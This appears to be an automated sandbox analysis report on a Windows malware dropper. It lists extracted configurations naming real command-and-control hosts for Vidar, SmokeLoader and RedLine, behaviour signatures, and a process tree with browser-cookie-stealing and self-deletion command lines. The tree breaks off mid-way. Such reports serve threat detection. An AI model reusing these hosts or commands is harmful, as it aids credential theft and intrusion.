Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    146s
  • max time network
    1819s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    29-07-2021 11:26

General

  • Target

    8 (13).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

5k_NEW_SERV

C2

45.14.49.117:14251

Extracted

Family

redline

C2

109.234.34.165:22204

Extracted

Family

redline

Botnet

28_7_r

C2

zertypelil.xyz:80

Extracted

Family

vidar

Version

39.8

Botnet

932

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    932

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • suricata: ET MALWARE Win32/Kelihos.F exe Download 2
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 63 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 28 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • autoit_exe 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 4 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 6 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 26 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 12 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
    1⤵
      PID:1100
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2660
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2652
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
            PID:2572
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2348
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2328
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1976
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1416
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1368
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1148
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:380
                      • C:\Users\Admin\AppData\Roaming\dcafdfj
                        C:\Users\Admin\AppData\Roaming\dcafdfj
                        2⤵
                          PID:5272
                        • C:\Users\Admin\AppData\Roaming\baafdfj
                          C:\Users\Admin\AppData\Roaming\baafdfj
                          2⤵
                            PID:5216
                            • C:\Users\Admin\AppData\Roaming\baafdfj
                              C:\Users\Admin\AppData\Roaming\baafdfj
                              3⤵
                                PID:6024
                            • C:\Users\Admin\AppData\Roaming\baafdfj
                              C:\Users\Admin\AppData\Roaming\baafdfj
                              2⤵
                                PID:4660
                                • C:\Users\Admin\AppData\Roaming\baafdfj
                                  C:\Users\Admin\AppData\Roaming\baafdfj
                                  3⤵
                                    PID:5372
                                • C:\Users\Admin\AppData\Roaming\dcafdfj
                                  C:\Users\Admin\AppData\Roaming\dcafdfj
                                  2⤵
                                    PID:6048
                                  • C:\Users\Admin\AppData\Roaming\baafdfj
                                    C:\Users\Admin\AppData\Roaming\baafdfj
                                    2⤵
                                      PID:3020
                                      • C:\Users\Admin\AppData\Roaming\baafdfj
                                        C:\Users\Admin\AppData\Roaming\baafdfj
                                        3⤵
                                          PID:5428
                                      • C:\Users\Admin\AppData\Roaming\dcafdfj
                                        C:\Users\Admin\AppData\Roaming\dcafdfj
                                        2⤵
                                          PID:2088
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                        1⤵
                                          PID:996
                                        • C:\Users\Admin\AppData\Local\Temp\8 (13).exe
                                          "C:\Users\Admin\AppData\Local\Temp\8 (13).exe"
                                          1⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:3996
                                          • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                            "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of WriteProcessMemory
                                            PID:2624
                                            • C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\setup_install.exe
                                              "C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\setup_install.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Suspicious use of WriteProcessMemory
                                              PID:2760
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                4⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:4092
                                                • C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\sonia_1.exe
                                                  sonia_1.exe
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:1660
                                                  • C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\sonia_1.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\sonia_1.exe" -a
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:1188
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                4⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:1904
                                                • C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\sonia_2.exe
                                                  sonia_2.exe
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Checks SCSI registry key(s)
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious behavior: MapViewOfSection
                                                  PID:2784
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c sonia_3.exe
                                                4⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:2344
                                                • C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\sonia_3.exe
                                                  sonia_3.exe
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Modifies system certificate store
                                                  PID:1460
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 956
                                                    6⤵
                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                    • Program crash
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4868
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                4⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:2296
                                                • C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\sonia_4.exe
                                                  sonia_4.exe
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1032
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c sonia_5.exe
                                                4⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:4076
                                                • C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\sonia_5.exe
                                                  sonia_5.exe
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Checks computer location settings
                                                  PID:184
                                                  • C:\Users\Admin\Documents\jiDlP3TEju5dM73Z0_VBij0j.exe
                                                    "C:\Users\Admin\Documents\jiDlP3TEju5dM73Z0_VBij0j.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:5104
                                                    • C:\Users\Admin\Documents\jiDlP3TEju5dM73Z0_VBij0j.exe
                                                      "C:\Users\Admin\Documents\jiDlP3TEju5dM73Z0_VBij0j.exe"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Checks SCSI registry key(s)
                                                      • Suspicious behavior: MapViewOfSection
                                                      PID:4980
                                                  • C:\Users\Admin\Documents\M0zWMW6o8vzQ71DUQa8_Dq2C.exe
                                                    "C:\Users\Admin\Documents\M0zWMW6o8vzQ71DUQa8_Dq2C.exe"
                                                    6⤵
                                                      PID:5092
                                                      • C:\Users\Admin\Documents\M0zWMW6o8vzQ71DUQa8_Dq2C.exe
                                                        C:\Users\Admin\Documents\M0zWMW6o8vzQ71DUQa8_Dq2C.exe
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:3048
                                                    • C:\Users\Admin\Documents\Wxa4i6292iziXor74Dxo4Vj3.exe
                                                      "C:\Users\Admin\Documents\Wxa4i6292iziXor74Dxo4Vj3.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5080
                                                      • C:\Users\Admin\AppData\Roaming\8901142.exe
                                                        "C:\Users\Admin\AppData\Roaming\8901142.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:2812
                                                      • C:\Users\Admin\AppData\Roaming\7924569.exe
                                                        "C:\Users\Admin\AppData\Roaming\7924569.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Adds Run key to start application
                                                        PID:4632
                                                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          PID:5092
                                                      • C:\Users\Admin\AppData\Roaming\4748781.exe
                                                        "C:\Users\Admin\AppData\Roaming\4748781.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:4400
                                                    • C:\Users\Admin\Documents\eRt73pkFT9Yk3axm75p8vi3n.exe
                                                      "C:\Users\Admin\Documents\eRt73pkFT9Yk3axm75p8vi3n.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:2704
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                        7⤵
                                                          PID:4368
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 252
                                                          7⤵
                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                          • Program crash
                                                          PID:1452
                                                      • C:\Users\Admin\Documents\QJZl01H0uDwQGR3jEW96GGb5.exe
                                                        "C:\Users\Admin\Documents\QJZl01H0uDwQGR3jEW96GGb5.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:2152
                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:2368
                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:4752
                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:5412
                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                          7⤵
                                                            PID:5464
                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            7⤵
                                                              PID:5488
                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:5464
                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:6060
                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              PID:4592
                                                          • C:\Users\Admin\Documents\sJ7Ot_XhU9EFr8nzC8xwZrES.exe
                                                            "C:\Users\Admin\Documents\sJ7Ot_XhU9EFr8nzC8xwZrES.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:3300
                                                            • C:\Users\Admin\Documents\sJ7Ot_XhU9EFr8nzC8xwZrES.exe
                                                              "C:\Users\Admin\Documents\sJ7Ot_XhU9EFr8nzC8xwZrES.exe"
                                                              7⤵
                                                                PID:4440
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                  8⤵
                                                                    PID:5340
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                      9⤵
                                                                        PID:5872
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5872.0.1540209804\33378516" -parentBuildID 20200403170909 -prefsHandle 1516 -prefMapHandle 1508 -prefsLen 1 -prefMapSize 219680 -appdir "C:\Program Files\Mozilla Firefox\browser" - 5872 "\\.\pipe\gecko-crash-server-pipe.5872" 1600 gpu
                                                                          10⤵
                                                                          • Drops startup file
                                                                          PID:5100
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5872.3.1607439711\1554752742" -childID 1 -isForBrowser -prefsHandle 5568 -prefMapHandle 5564 -prefsLen 543 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 5872 "\\.\pipe\gecko-crash-server-pipe.5872" 5580 tab
                                                                          10⤵
                                                                            PID:388
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        PID:4956
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff8fa2f4f50,0x7ff8fa2f4f60,0x7ff8fa2f4f70
                                                                          9⤵
                                                                            PID:4616
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1992,7010855982607661428,12295174104634799195,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2000 /prefetch:2
                                                                            9⤵
                                                                              PID:5244
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1992,7010855982607661428,12295174104634799195,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2096 /prefetch:8
                                                                              9⤵
                                                                                PID:5144
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,7010855982607661428,12295174104634799195,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2076 /prefetch:8
                                                                                9⤵
                                                                                  PID:3276
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1992,7010855982607661428,12295174104634799195,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2608 /prefetch:1
                                                                                  9⤵
                                                                                    PID:4348
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1992,7010855982607661428,12295174104634799195,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2628 /prefetch:1
                                                                                    9⤵
                                                                                      PID:5388
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1992,7010855982607661428,12295174104634799195,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
                                                                                      9⤵
                                                                                        PID:3300
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1992,7010855982607661428,12295174104634799195,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
                                                                                        9⤵
                                                                                          PID:4864
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1992,7010855982607661428,12295174104634799195,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
                                                                                          9⤵
                                                                                            PID:5604
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1992,7010855982607661428,12295174104634799195,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:1
                                                                                            9⤵
                                                                                              PID:1164
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1992,7010855982607661428,12295174104634799195,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5724 /prefetch:8
                                                                                              9⤵
                                                                                                PID:68
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1992,7010855982607661428,12295174104634799195,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5860 /prefetch:8
                                                                                                9⤵
                                                                                                  PID:3332
                                                                                                • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                                                                  9⤵
                                                                                                    PID:3304
                                                                                                    • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6936aa890,0x7ff6936aa8a0,0x7ff6936aa8b0
                                                                                                      10⤵
                                                                                                        PID:1916
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1992,7010855982607661428,12295174104634799195,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5672 /prefetch:8
                                                                                                      9⤵
                                                                                                        PID:3200
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1992,7010855982607661428,12295174104634799195,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1776 /prefetch:8
                                                                                                        9⤵
                                                                                                          PID:2152
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1992,7010855982607661428,12295174104634799195,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5872 /prefetch:2
                                                                                                          9⤵
                                                                                                            PID:5928
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "cmd.exe" /C taskkill /F /PID 4440 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\sJ7Ot_XhU9EFr8nzC8xwZrES.exe"
                                                                                                          8⤵
                                                                                                            PID:5824
                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                              taskkill /F /PID 4440
                                                                                                              9⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:4844
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "cmd.exe" /C taskkill /F /PID 4440 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\sJ7Ot_XhU9EFr8nzC8xwZrES.exe"
                                                                                                            8⤵
                                                                                                              PID:4816
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
